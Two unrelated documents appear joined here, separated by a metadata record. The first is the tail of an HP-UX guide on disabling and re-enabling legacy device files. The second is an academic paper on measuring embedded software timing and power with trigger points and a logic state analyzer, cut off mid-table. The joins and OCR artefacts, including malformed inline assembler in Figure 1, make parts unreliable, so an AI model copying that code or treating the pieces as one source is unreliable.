If users want to do an automatic replacement of DSF names and hardware paths found in any files, re-run the
command adding the option `–R`; adding `–F` will execute the replacements without asking for permission:
```
# iofind -n -H -d / -R -F
```
**Examples of using rmsf -L, insf -Lv, and insf -L**
**Example 1** – To disable legacy mode, run:
```
# rmsf -L
```
WARNING: This command may be disruptive to the system.
Before running this command, make sure you have first run
iofind(1M) and migrated all applications using legacy device
special files. Please refer to the man page of rmsf(1M) to
verify the possible side effects of the option `-L'.
Do you want to continue?
(You must respond with 'y' or 'n').: y
rmsf: Legacy mode has been successfully disabled
**Example 2** – To verify whether legacy mode is disabled, run:
```
# insf -L -v
```
insf: Legacy mode is disabled
– To verify that all legacy DSFs are removed, run:
```
# ioscan -kfn
```
o The ioscan output does not display any entries for mass storage devices.
o The legacy DSF directories (/dev/dsk, /dev/rdsk, /dev/rmt) are empty.
**Example 3** – To re-enable legacy mode, run:
```
# insf -L
```
This command will re-install all legacy I/O nodes and legacy DSFs.
Do you want to continue?
(You must respond with 'y' or 'n').: y
insf: Legacy mode has been successfully enabled
– To verify that the legacy mode has been re-enabled, run:
# ioscan -kfn
- The ioscan output again shows the entries for the mass storage devices.
- The DSFs are recreated in the `/dev/dsk`, `/dev/rdsk`, and `/dev/rmt` directories.
|
{"Source-Url": "https://community.hpe.com/hpeb/attachments/hpeb/itrc-156/476576/2/HP-UX%2011i%20v3%20Persistance%20DSF%20Migration%20Guide%20-%20July%202010.pdf", "len_cl100k_base": 11995, "olmocr-version": "0.1.53", "pdf-total-pages": 19, "total-fallback-pages": 0, "total-input-tokens": 44752, "total-output-tokens": 12976, "length": "2e13", "weborganizer": {"__label__adult": 0.00048828125, "__label__art_design": 0.0008249282836914062, "__label__crime_law": 0.0003995895385742187, "__label__education_jobs": 0.0016078948974609375, "__label__entertainment": 0.00025916099548339844, "__label__fashion_beauty": 0.0002765655517578125, "__label__finance_business": 0.0016260147094726562, "__label__food_dining": 0.0002980232238769531, "__label__games": 0.0019931793212890625, "__label__hardware": 0.06689453125, "__label__health": 0.0004057884216308594, "__label__history": 0.0006089210510253906, "__label__home_hobbies": 0.00038242340087890625, "__label__industrial": 0.0023651123046875, "__label__literature": 0.0003995895385742187, "__label__politics": 0.000270843505859375, "__label__religion": 0.00058746337890625, "__label__science_tech": 0.29736328125, "__label__social_life": 8.028745651245117e-05, "__label__software": 0.1610107421875, "__label__software_dev": 0.460693359375, "__label__sports_fitness": 0.0002963542938232422, "__label__transportation": 0.0007090568542480469, "__label__travel": 0.0002377033233642578}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47477, 0.02299]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47477, 0.41507]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47477, 0.85333]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 2985, false], [2985, 5602, null], [5602, 8369, null], [8369, 11094, null], [11094, 14058, null], [14058, 17710, null], [17710, 21262, null], [21262, 23900, null], [23900, 27262, null], [27262, 30934, null], [30934, 33342, null], [33342, 36266, null], [36266, 38133, null], [38133, 40334, null], [40334, 42430, null], [42430, 44985, null], [44985, 47304, null], [47304, 47477, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 2985, true], [2985, 5602, null], [5602, 8369, null], [8369, 11094, null], [11094, 14058, null], [14058, 17710, null], [17710, 21262, null], [21262, 23900, null], [23900, 27262, null], [27262, 30934, null], [30934, 33342, null], [33342, 36266, null], [36266, 38133, null], [38133, 40334, null], [40334, 42430, null], [42430, 44985, null], [44985, 47304, null], [47304, 47477, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47477, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47477, null]], "pdf_page_numbers": [[0, 0, 1], [0, 2985, 2], [2985, 5602, 3], [5602, 8369, 4], [8369, 11094, 5], [11094, 14058, 6], [14058, 17710, 7], [17710, 21262, 8], [21262, 23900, 9], [23900, 27262, 10], [27262, 30934, 11], [30934, 33342, 12], [33342, 36266, 13], [36266, 38133, 14], [38133, 40334, 15], [40334, 42430, 16], [42430, 44985, 17], [44985, 47304, 18], [47304, 47477, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47477, 0.08483]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
cb2e6251715c5b2248cfdacafc5ae8e14ae09456
|
Compact Trace Generation and Power Measurement in Software Emulation
Fabian Wolf, Judita Kruse, Rolf Ernst
Institut für Datenverarbeitungsanlagen, Technische Universität Braunschweig
Hans-Sommer-Str. 66, D-38106 Braunschweig, Germany
Tel: +49 531 391 3728, Fax: +49 531 391 4587
Email: {wolf|kruse|ernst}@ida.ing.tu-bs.de
ABSTRACT
Evaluation boards are popular as prototyping platforms in embedded software development. They often are preferred over simulation to avoid modeling effort and simulation times as well as over complete hardware prototypes to avoid development cost. Evaluation boards provide accurate timing results as long as the main architecture parameters match the target hardware system. For larger processors, this is often not the case since the cache and main memory architectures might differ. Another problem is the lack of observability of the software execution. Pin-Out versions of processors with improved observability are expensive (so are in-circuit emulators) and not always available, and on-chip processor test support requires software adaptation. A particular problem arises when trying to verify the running time bounds of embedded software such as required for hard real-time systems. Here, formal analysis approaches have been proposed which require segment-wise execution of a program under investigation. Another problem is the accurate analysis of processor power consumption for different execution paths.
The paper presents an approach to fast acquisition of compact timed execution traces with instruction cycle accurate power samples on commercial evaluation kits. Global system modeling abstracts the environment to a set of parameters that is included in the software under investigation for segment-wise, real-time execution. Trigger points write source code line numbers and energy samples to the address and data bus where they are read by a logic state analyzer. Experiments show that the application of trigger points avoids the acquisition of long, complete traces on sophisticated, dedicated prototyping platforms as in previous work while more accurate execution time and power consumption can be delivered.
Keywords: Software Emulation, Program Trace Generation, Software Timing and Power Measurement
1. INTRODUCTION
Embedded system running time and power analysis are required for validation and design space exploration of embedded systems. Due to the increasing amount of software on reusable target architectures, fast and accurate software running time and power analysis play an important role in VLSI system design while rapid prototyping needs early physical execution. Test patterns can instrument the program under investigation for execution while static approaches isolate executable program segments from the program.\(^1\,2\) We investigated the possibility of using commercial evaluation kits and a logic state analyzer with network access for fast and accurate acquisition of embedded system software execution time and power consumption.
For the verification of hard real-time systems, formal analysis approaches require segment-wise, real-time execution and measurement of the program under investigation. The original cache behavior has to be preserved and acquired because it has a major impact on execution time. Cycle accurate power consumption needs to be measured without changing the execution context of the instructions under investigation. These requirements are impossible to meet with most existing approaches where sophisticated communication of the complete processor under investigation with its environment results in unacceptable emulation times. In these approaches, major changes to the instrumented program invalidate its original cache behavior and power consumption while measurement results are only available for single instructions or the complete program. In the presented approach, beforehand system modeling\(^3\) can deliver the relevant parameters of the surrounding components that are integrated as far as possible at compile time. This allows real-time execution and measurement of the instrumented program or isolated program segments while relevant information is stored in a very compact trace. An off-the-shelf processor evaluation kit and very little hardware for power measurement are needed. Digital values are stored by the instrumented program under test itself. A logic state analyzer with a network connection to the development platform is used to measure execution time and power consumption in a very efficient way that abstracts the board hardware to a processor simulator.
This paper is organized as follows: Section 2 reflects previous work. Section 3 introduces the code instrumentation of programs before section 4 explains our approach to measurement of execution time. Section 5 explains our approach to power measurement. Section 6 presents experiments with a commercial evaluation kit before we conclude in section 7.
2. PREVIOUS WORK
Processor evaluation kits with PCI bus interfaces are state-of-the-art in embedded system software emulation using desktop personal computers. They are often preferred to simulation since they avoid the necessity to include processor models and develop models for the embedded system environment. Accurate processor models are often hard to get and environment model development extends design time and cost. Most software development environments are tool suites with built-in debuggers that run on a host PC or work station and communicate with the evaluation kit. The compilers generate special executable files for debugging. This is a cost effective approach, but it lacks the capability of detailed software execution analysis, such as the detection and analysis of "hot spots" in the program execution, i.e. parts of a program which are executed frequently or consume high energy. Moreover, evaluation board memory architecture is often different from the target architecture. To overcome the different drawbacks, several research groups have presented different prototyping and measurement approaches with real-time execution of the program under investigation.
The dedicated BACH address tracing platform\(^4\) is used to collect an Intel 486 specific trace. It collects all access addresses while source line numbers are needed for software emulation. Traces get long and are hard to back annotate to the source code of the program under investigation. Caches are switched off during tracing, so no relevant performance metrics can be estimated. The system also lacks a time base for the trace. As the time tracing hardware was specially built for the Intel 486 it is hard to be used for other processor types such as RISCs. Another approach with a dedicated architecture\(^5\) called TimerMon instruments the code with write references to a special trace memory including event ID and timestamp for timing measurement when executing the program under investigation. A time base is present, but caches are not regarded in this approach. No power measurement is part of these previous approaches while both need sophisticated, dedicated hardware to store the traces.
Experiments with SPARC and DSP evaluation platforms\(^6\) can be done in a very efficient way. Execution time and power consumption of single machine instructions are determined by executing them in a loop. An analog ampere meter is used to measure the average current in the board supply line for power measurement. The metrics are used in an instruction timing addition approach\(^1\) extended to an instruction energy addition approach. No remote access for starting the measurement or automatic evaluation and exploitation of the measurement results is possible. The supply current of the complete board is measured, so the power consumption of the processor cannot be separated from that of the memories and the other components on the board. No instruction cycle accurate measurement is possible because the system lacks a time base and the possibility to store measured values after a trigger definition. Instruction energy consumptions are measured in a loop instead of the real context of the program, thus the values are extremely inaccurate, especially when caches, pipelines and global register sets are present. This is a common case with RISC processors resulting in overlapping instruction execution. As the system also lacks the possibility to store a power trace, the measurement of a complete program or program segment is not possible.
These research approaches cannot automatically reference the line numbers of the source code. Often only execution time and power consumption of either the complete program or single instructions on the complete board under investigation can be measured while the delivered trace only contains an address sequence without execution time, power consumption, cache behavior or references to program segments in the source code. Caches that have a substantial effect on execution time and power consumption are either not present or switched off in the presented approaches. This can be overcome by using fast cache simulation\(^7\) but none of the reviewed approaches can deliver accurate results for execution time and power consumption of program segments on more complex processor hardware.
3. CODE INSTRUMENTATION AND PROGRAM PARTITIONING
The software under investigation usually contains control structures that depend on input data while measurement needs an execution of the program. For this purpose, a test pattern representing one possible input data set can be given leading to one execution and according measurement of the program that is only valid for the test pattern. This enables us to use our approach for the complete program. Segment-wise execution time and power consumption are needed as a base for static validation of real-time embedded software,\(^2\) so every segment needs to be executed. We need to mark the beginning and the end of a complete program or a program segment to measure its execution time and power consumption. This is done with trigger points. These points mark the source code to be measured and can be recognized with the logic state analyzer connected to the processor bus. The beginning and the end of the program segment under investigation is marked. Trigger points are implemented by store instructions to non-cached memory spaces. Details are explained in section 4.
Test pattern might not reflect best or worst cases of running time or power consumption. Static analysis explores feasible and infeasible execution paths\(^1,2\) and designer interaction.\(^8\) Program segment execution time and power consumption can be measured with our approach. In the following, we present different possibilities for the instrumentation of the complete program or the program segments under investigation.
3.1. Instrumentation of the Complete Source Code
For timing and power measurement on the evaluation kit, the program can be executed as a whole using test patterns or any set of input data. Where control structures are depending on input data, paths for best case and worst case execution may differ from the control flow given by the test patterns. This may be solved by path analysis\cite{8,2,1} which is beyond the scope of this paper. As long as test patterns cover every program segment, we mark the beginning and the end of a program segment with a trigger point. Execution of the program segment permits the measurement of its execution time and power consumption that is a base for the calculation of the worst case and best case execution time or power consumption bounds of the feasible paths. This results in the upper and lower bounds for the execution time and power consumption of the complete program.
3.2. Instrumentation of Isolated Program Segments
If program segments are not reached in the execution of the instrumented program because test patterns do not cover all potential execution paths, while the standalone execution of the missing program segment is possible, they can be extracted and be executed separately. Therefore, they are loaded to the base address they would be mapped to when the complete program is given to the linker. The map file delivers this information. The used variables must be initialized to avoid, for example, divide-by-zero effects. A standard data flow analysis\cite{9} provides the variables to be declared and initialized to their start values to make physical execution of the program segment possible.
3.3. Simulation of Program Segments
The program segment or complete program can be simulated as a reference solution using given input data and a cycle true processor model\cite{10},\cite{10} which can exactly deliver processor execution time or power consumption. This can be any well established, off-the-shelf processor simulator provided by the processor vendor. As an example for cycle true processor simulation, that delivers the execution time or power consumption of the program, a StrongARM simulator core is combined with the DINER O\cite{7} delivering both instruction and data cache behavior. Source codes have been recompiled to one simulator. Architecture modeling regarding execution time is given by the Cygnus simulator while the energy dissipation model\cite{6,11} is directly based on the execution time in a first approach. Compared to the evaluation kits, simulation is slow, inaccurate or the simulator might not be available at processor release time, so the application of software emulation is feasible.
3.4. Execution on the Evaluation Kit
After the code under investigation has been cross-compiled for the processor on the evaluation kit it is downloaded to its memory. This is the only down link communication, the execution runs in real-time during the measurement. If different processes need to be measured at once, a real-time operating system, RTOS, that allows unrestricted memory access should be installed on the evaluation kit.
4. TIMED TRIGGER POINT TRACE
When programs or program segments can be executed by code instrumentation or path extraction, the trace and the resulting execution time and power consumption of the executed code can be obtained by measurement. Previous approaches store the full address sequence of data and address bus which leads to memory consuming program traces. We reduce the trace of the program by using trigger points.
4.1. Compact Trace Generation
Trigger points mark the beginning and the end of a program or a program segment that we need to measure the execution time for. Relevant program segments can be determined with the SYMTA path analysis tool suite.\cite{2,1} If we only need the timing for the segment, we trigger a clock that is using the system clock of the board when we pass the first trigger point and stop it when we pass the last one. Intermediate program behavior is not needed. The trigger points have to contain information about the source code lines the program segments begin and end at to permit a back annotation of the timing to the program under investigation. In our approach, several steps are needed to implement a fully automated measurement and back annotation of results for execution time and power consumption to the source code.
1. Trigger points need to be inserted into the source code. To preserve the program structure with automatic trigger point insertion, every block belonging to a control structure needs to be set in curly braces \{ \}. This is done in a recursive descend. After that, trigger points are automatically inserted into the code. A table with source line cross references is built for later back annotation.
2. A trigger point is implemented by a store of the source code line information to a defined trigger address in a non cached part of the memory space. An architecture specific example is given in figure 1. Unlike previous work, this method allows to use the processor cache. The store instructions are instrumented as inline assembler lines to the C source code. Assembler instruction and trigger address can easily be changed to various architectures while the trigger point locations have to be a conservative selection with respect to pipeline and cache behavior as well as the global register allocation.
3. During execution, the trigger points are found by monitoring the address bus with a logic state analyzer. The associated data is stored, containing the current source line number. The line numbers of the trigger points with corresponding logic state analyzer time stamps are stored instead of full traces. Address and data bus can either be measured at extra connections at the processor pins or by connecting the probe to a bus slot of the evaluation board. The time base for the offset between the trigger points is calculated by the logic state analyzer using the board clock, not by dedicated hardware like in previous approaches.
4. The development platform reads the results from the logic state analyzer via a simple ftp session. This raw data can be evaluated in many ways. Execution time of the whole program and execution counts plus execution time of program segments between trigger points can be achieved. An example of an instrumented program and the resulting intermediate logic state analyzer format can be seen in figure 6. Best case, worst case, first or last executions of the program segments marked by trigger points can be computed as well as the averages.
4.2. Exploitation of Trigger Points and Back Annotation
In a first step, we have to mark the source code lines that we want to measure the execution time and power for. This needs a file denominating these lines in ascending order separated by NEWLINES, called definition file. We define a format for a trigger point comment that supports the direct determination of the source lines.
/* TPcommentID: TPdefinition1, TPdefinition2, .. */
TPcommentID: %TP
TPdefinition : TPname: TPkind
TPname : string
TPkind : BEGIN | SIMPLE | END
A trigger point comment is composed of one or more trigger point definitions, each of which consists of a trigger point name and a trigger point kind. Any string constant can be chosen for a trigger point name while all trigger points with the same name are collected in a trigger point class. The first trigger point of a class will be marked as BEGIN, the last as END and the others as SIMPLE. But it is also possible to set all trigger points of a class to the kind SIMPLE. The trigger point comment should exactly be written in the line before the line of interest. Only for an END point it makes sense to set it behind the last instruction of interest. A tool reads the source code with trigger point comments and creates the definition file, according to the coded information and the given trigger point class. It is possible to create the definition file with other tools or even manually. As we insert additional source code into a program, we have to preserve the consistency of the program. Control structures like if-else permit the writing of single dependent C instructions without applying braces. In the case of triggering on such single dependent instructions, we have to insert additional braces, because now there are two instructions depending on the same control structure, namely the inline assembler line and the instruction of interest. We set braces around every instruction block using a recursive descent.
The next step is the insertion of the inline assembler lines. The insertion is done by reading the prepared C file and by writing the architecture specific inline assembler lines to the line numbers, which are denominated in the definition file. The cross references of the original, the prepared and the trigger point file line numbers are stored in a table file. Finally the executable program is compiled by a standard C compiler. We automatically generate different control files for the logic state analyzer and the power device. Other control files are needed as input files for the terminal program of the evaluation kit. The measurement starts with a complete reset of the board by the software driven power control. The executable program is downloaded to the evaluation kit and the setup program containing the trigger sequence is loaded to the logic state analyzer. After program execution the logic state analyzer is stopped, and the results are transferred from the analyzer to the host.
At last the results are evaluated on the host. As the same trigger point can be reached on different paths, it has to be analyzed in relation to the others. If there are more iterations, for example when measuring a loop, the results are given for the total number of executions. They are enumerated for the first and the last, the worst and the best cases. It is possible to mark a special iteration, too. Finally the setup overhead at program start as well as the number of trigger points passed are listed.
4.3. Example: Timing Measurement for a SPARClite RISC Processor
Execution time and power consumption of program segments have been measured on a commercial SPARClite evaluation kit by inserting trigger points. The Cygnus C compiler has been used for assembly code generation. In the current setup we are using DRAMs which prevents us from separating cache misses from memory refresh as we cannot access the memory controller, but this can be overcome by analyzing the refresh strategy or selecting SRAMs when choosing an evaluation kit.
After program completion the results are back annotated to the source code. The whole measurement is software controlled including board startup by switching on its power supply from the network, trigger point insertion, compilation, downloading, execution and back annotation. An overview for the SPARClite evaluation kit and its setup is shown in figure 2. The terminal program only writes the instrumented executable program to the board, which is a fast one way communication. The program is executed in real-time before the results are read from the logic state analyzer memory.
The implementation of the trigger points for the definition of the beginning and the end of a program segment or the complete program for SPARClite is shown in figure 1. The address word contains the trigger address that is recognized by the logic state analyzer. The data bus value consists of a file identifier to distinguish between different sources. It is followed by the source code line number that is also read by the logic state analyzer. For power measurement, this trigger point is extended in section 5. The access address as well as the logic state analyzer software can easily be modified for an adaption to different evaluation kits.
```
23 __asm__ volatile ("sta %0,[%r1]%2" : *(0xa000018), "rJ" (8), "I" (7));
24 printData();
25 __asm__ volatile ("sta %0,[%r1]%2" : *(0xa00001a), "rJ" (8), "I" (7));
```
**Figure 1.** Trigger points for SPARClite emulation boards
Any commercial evaluation kit with bus access can be used for this purpose. Our current work in the prototyping area focuses on software controlled execution time and power measurement on a StrongARM evaluation kit. The automation abstracts the evaluation kit to the same level as a software simulator for the architecture modeling of a program segment.
4.4. Limitations
The insertion of trigger points into the source code modifies the program under investigation. This implies some overhead and limitations regarding measurement precision caused by the insertion of trigger points.
- We want to keep the modifications conservative, so no global compiler optimization across trigger points is allowed, pipelines and registers are flushed and the caches are reset at trigger points. Compiler optimization shifting the code line of the trigger point has to be avoided, too.
- Each trigger point implies a timing overhead when the address is written to the bus. The number of cycles depends on the architecture. This overhead can easily be subtracted from the measured timing to get the real execution time.
- While the shifting source code line numbers caused by trigger point insertion are taken care of in a table, the shifting addresses of the object code through the insertion of store instructions for the trigger points have an unpredictable effect on pipeline and cache behavior. For this reason, we try to keep the modification through trigger point insertion as small as possible by inserting trigger points only at the beginning and the end of the program segment under investigation. Reducing the number of trigger points does not only help to keep traces as compact as possible but it also leads to higher measurement precision regarding the influence of the trigger points to the system under investigation.
- Another limitation is the memory depth of the logic state analyzer. Even though the trace is very compact, we can only analyze as many trigger points as the memory of the logic state analyzer can store. In comparison to dedicated time tracing platforms, this off-the-shelf memory is easy to extend.
5. TIMED ENERGY SAMPLES
After successful implementation of the compact time tracing we extended our approach to power measurement. This extension can deliver the energy consumption of program segments or a small complete program. The instrumentation, the preparation and the insertion of trigger points into the program to mark the beginning and the end of a program segment under investigation are the same as introduced in section 4.
5.1. Hardware Setup
First of all, we need to select core and bus frequency we want to measure at because both influence the power consumption of board and processor. Then, a decision whether to measure the power consumption of the complete evaluation kit including processor, memories and interfaces or of the isolated processor has to be made. Measurement of the complete board power consumption is far easier as we only have to access the power connector. For isolated power measurement of the processor we have to access its on-board power regulator output current.
Power is measured by inserting a shunt resistor into the power supply line. For on-board access, the resistor has to be mounted into the power supply under investigation. For the calculation of the power consumption the voltage across the resistor is measured as we can see for SPARC lite in figure 3. The setup is valid for most evaluation kits. We have to ensure that the voltage across the resistor does not reduce the supply voltage below the specified minimum input level of board or processor. This means we have to keep this voltage as small as possible by choosing a small resistor value, but then it is much too small for the input level needed for the analog-to-digital conversion. An analog amplifier generates the according input voltage with respect to value and offset for the analog-to-digital conversion. As amplification and analog-to-digital conversion have to be done at processor speed, we need very fast components and limit the measurement to eight bit which is accurate enough in a first approach.
This kind of measurement delivers the power consumption at one point in a processor cycle while power consumption during a cycle can vary a lot due to switching effects near the clock edges. For this reason, we integrate the power consumption over a complete clock cycle which is sampled. This means we get one value for the energy consumed in the cycle with each activation of the analog-to-digital conversion. The logic state analyzer reads the digital output in parallel to the address bus, so a reference to the source code is given that can be used for sophisticated exploitation of instruction level power consumption. As we get one sample for every cycle, the influence of adjacent instruction cycles can be investigated. In other words, supply
Figure 2. SPARC lite evaluation kit with logic state analyzer and host functionality
current results in a voltage across the resistor which represents the instantaneous power consumption. This is integrated to achieve the energy consumption of an instruction. In the following, the term power consumption is used because it represents all these metrics, actually meaning the energy consumption in the cycle.
5.2. Single Shots
Trigger points lead to a measurement of the power consumption of the cycle the instrumented instruction is executed in. This means there is absolutely no reference to the program under investigation because we measure the power consumption of the inserted trigger point. This is still necessary to be able to subtract its overhead. For measurement of single cycles, the sampling of power has to be delayed at least one cycle beyond the trigger point, but its influence is still present. Measurement of single cycles does not make much sense in energy measurement for program segments or complete programs. It is only needed to measure the power consumption of specific instruction sequences to build up a table based approach.
5.3. Continuous Measurement
For program segment measurement, at least one sample of the integrated power consumption per clock cycle is needed. Measurement is started and terminated with a trigger point like in trace acquisition. Between the trigger points only the sampled power consumption for every cycle is read with the logic state analyzer. The address bus can optionally be read for more accurate back annotation. This means that we get a trace of power samples between the trigger points, so we can assign the power consumption to a program segment. It delivers very accurate power consumption measurements compared to previous approaches while very little hardware overhead is needed. As we directly measure the power consumption of the instructions in the environment they are executed in instead of loops, their original power consumption is delivered. The same trigger points are used for timing and power measurement, so the same mechanisms for the result calculation like in section 4.2 can be used.
While single shots are needed for a table based approach, continuous power measurement can be applied for design space exploration of different implementations of program segments regarding their coding influence to power consumption.
5.4. Example: Power Measurement for SPARClite
We implemented the power measurement approach using the SPARClite evaluation kit that we already applied for compact timed trace generation. Figure 3 shows the hardware setup to measure the power consumption. The cycle energies measured between the trigger points are added to the total energy consumption for the trigger points. These values can be exploited the same way as the execution times that we explained in 4.2. The core frequency, being twice the bus frequency, is generated from the processor itself. This means we need two clocks, one for the bus clock of the processor and one for the measurement which must be the same as the core frequency.

In order to permit an 80 MHz operation of the power measurement, fast components for amplification, integration and analog-to-digital conversion are needed: A precision 0.1 Ω shunt resistor in the power supply lines delivers an analog voltage of 10 to 40 mV. This ensures correct operation of all components on the board because the remaining supply voltage is still way above the minimum. The MAX436 operational amplifier with 275 MHz gain bandwidth product GBP is used as the differential amplifier. The power integrator uses a 39 Ω resistor, a 10 pF capacitor and an AD8012 operational amplifier with 350 MHz GBP. The same operational amplifier is used for the preamplification followed by an NSCLC425 operational amplifier with 1.9 GHz GBP for the main amplification to gain a level suitable for analog-to-digital conversion. An ADOP27GS decouples amplification from the analog-to-digital conversion which is using an AD9054A eight bit converter with 135 mega samples per second for fast operation. The amplification, offset and integration have to be finetuned to permit a coverage of the full voltage range by the eight bit of the analog-to-digital conversion to achieve a wide range of measured values. The clock generator consists of a Philips X05860 80 MHz clock for the measurement and a 74F109N flip-flop which divides the clock to 40 MHz for the processor.
Figure 4. SPARClite evaluation kit with measurement facilities
Figure 4 shows the SPARClite evaluation kit with the measurement facilities and the logic state analyzer which is connected to the local network. The small PCB on the left contains the power measurement while only the evaluation kit and the logic state analyzer are needed for the trace acquisition. Figure 5 shows the frequency diagram of the whole power measurement circuit. The amplification is nearly constant until we reach the maximum frequency of the circuit which is between 80 and 90 MHz that we can see in figure 5.
5.5. Limitations
For the trigger points, the same drawbacks apply as for the acquisition of the program segment execution time. The following problems are additionally introduced by power measurement.
- If the power consumption of single cycles shall be measured, trigger points have a particular influence because the change in the program is happening very near to the cycle under investigation. These local effects can be overcome by continuous measurement of the segment with the instruction under investigation and the address bus. This delivers a reference to the instruction while the trigger point can be inserted some cycles in advance. For most RISC processors, there is no possibility to read the processor and pipeline status, so there may be no exact coherence between the power trace and the assembler program while pipelined execution also influences the results for the power consumption of single instructions.
• All the measurement hardware is dependent on the processor speed of the board because the time constant for the integration has to be set with a resistor and a capacitor on the board. These have to be changed to adopt the system to other processor speeds. It is no serious restriction because the change is easy to do while execution time and power consumption for other processor speeds can directly be calculated from the speeds we have done our measurements at.
• As eight bit for every instruction cycle are needed when power consumption is measured, we might run into problems with the logic state analyzer memory size. It is more severe than for pure trace acquisition where only the trigger points need to be stored. This problem may be overcome with source code partitioning using path analysis² and measurement of shorter program segments that allow to fit the power trace into the logic state analyzer memory.
5.6. Table Based Power Estimation Tool Suites
When execution times and power consumptions of single machine instructions as well as timing or power penalties for transitions between certain instructions have been determined by measurement, these values can be used for the tool based prediction of execution time and power consumption.⁶ This is done in an instruction cost addition (ICA)² approach. Then, traces are identified running the code on a host processor while the instruction execution cost like execution time or power consumption is taken from a table delivered by beforehand measurement. The problems for the measurement of single shots apply.
5.7. Global Access
The possibility to connect the logic state analyzer with the measured execution time and power consumption metrics to the local network with simple ftp or telnet sessions allows a very flexible integration of the presented prototyping approach into any timing or power estimation tool suite. Software driven remote power control of logic state analyzer and evaluation kit as well as shell script driven measurement allow to simply specify where trigger points are set into the source code, start the measurement and read the results. This even permits Internet based measurement with a standard web browser running on top of the application assuming a security mechanism is implemented.
At present, the SPARClite evaluation kit and the logic state analyzer are part of the local network and can be accessed via Ethernet. Current work deals with the connection of experimental setups including a research platform and measuring devices to the Internet. The implementation of a web browser user interface is within the scope of this project, which provides an Internet based hardware and software design environment. Both scheduling techniques and security mechanisms are hot topics.
6. EXPERIMENTS
In the following, experiments for compact trace acquisition and results for timing and power measurement of program segments and complete programs are presented. Experiments for timing and power measurement are done in parallel because the measurement of execution time does not increase complexity when trigger points are added for power measurement.
6.1. Case Study: Bubble Sort Algorithm
In a case study, the execution time and the power consumption of a complete bubble sort algorithm instrumented with one set of input data have been measured, no best case or worst case bounds have been determined. The source code is shown on the upper left side of figure 6a. Trigger points are specified at the beginning and at the end of the program to demonstrate the measurement of the complete program. An additional trigger point is inserted in the outer \texttt{for}-loop to demonstrate multiple iterations across a trigger point. Results are back annotated to the source code where the trigger points are inserted. The different tables in figure 6 show the following: In \textit{a}, the source code with the trigger point definitions is shown which is translated to a source code with additional braces \{ \} and inline assembler instructions in \textit{b}. In \textit{c} we can see the trigger point definition file while the table in \textit{d} keeps track of the shifting source code references. An intermediate format of the values measured with the logic state analyzer is given in \textit{e}. The first column shows the trigger point number followed by trigger address, file ID, source code line number extracted from the trigger point and the timing offset in states relative. The source code with the results is shown in \textit{f}. Back annotated results always reflect the relative values to the last trigger point. The number of iterations across the trigger point is given at the very beginning of the line followed by the execution time and the power consumption. Execution time and power consumption at the first trigger point give the values for the program start. The execution time between the trigger points 10 and 24 in figure 6f, i.e. the timing for the execution of the complete program without startup overhead is 1900 ns at TP24 plus 13725 ns at TP10 resulting in 15625 ns for the total execution time. The power consumption is 1560 nWs plus 10899 nWs resulting in 12459 nWs for the overall power consumption. Depending on the setting of trigger points, measurements for program segments like the inner \texttt{for}-loop are possible.
Further experiments for table based software power prediction as explained in section 5.6 and presented by Tiwari\textsuperscript{6,12} are straightforward to implement while we focus on direct measurement of program segments because our prototyping platform and the measurement facilities are easy to operate due to the remote control.
6.2. Application in a Static Software Estimation Approach
In the following experiments, the SPARC\textsuperscript{lite} evaluation kit was integrated into a timing and power estimation tool suite.\textsuperscript{2} No test patterns for code instrumentation are inserted but the conservative worst cases for execution time and power consumption are determined using path analysis. The tool suite first determines (in-)feasible paths in a program that can be executed on the evaluation kit. This delivers worst case execution time and power consumption of the program segments. The worst case path through the program is determined to deliver the overall worst case for execution time and power consumption.
Using this methodology, measurements for execution time and power consumption of program segments with the SPARC\textsuperscript{lite} evaluation kit were done as presented in table 1. Here we investigated execution time and power consumption of the top level of an ATM switch component. Table 1 gives the upper bounds for execution time and power consumptions of the operation administration and maintenance (OAM) component using different path analysis techniques. Simulation results for program segments using StrongARM are compared to our SPARC\textsuperscript{lite} example where the prototyping approach is using the compact trace acquisition and power measurement for the program segments. In the first approach by Malik,\textsuperscript{5} measured program segments consisting of one basic block\textsuperscript{9} each are shorter than in the following two approaches because of a missing exploitation of program paths. This means more trigger points and the according overheads regarding conservative approaches for pipeline and cache states are part of the program leading to higher overestimations. In the second approach by Ye and Ernst,\textsuperscript{1} some basic blocks are joined to single feasible paths (SFP), so fewer trigger points are needed resulting in less overestimation. In the third approach by Wolf and Ernst,\textsuperscript{2} even fewer trigger points are needed because of the exploitation of a more accurate path analysis resulting in fewer, but longer program segments containing context dependent paths (CDP) with less overhead.
The exact case is determined by simulation or measurement of the complete program using worst case input data as test patterns. It serves as a reference to compare the overestimations of the conservative static approaches.
We notice that overestimations with the evaluation kit are higher than when using simulators, especially when more program segments are involved. The reason is the more conservative handling of program segments by using trigger points compared to the use of a cycle true processor simulator. This means the application of path analysis in conservative static approaches is very important when using evaluation kits for architecture modeling because it reduces the number of inserted trigger points and the according overhead. On the other hand, we have shown that our approach is suitable for segment-wise execution time and power measurement that is needed in static approaches.
Figure 6. Source code with trigger points and intermediate logic state analyzer format
<table>
<thead>
<tr>
<th>Group</th>
<th>SFP</th>
<th>CDP</th>
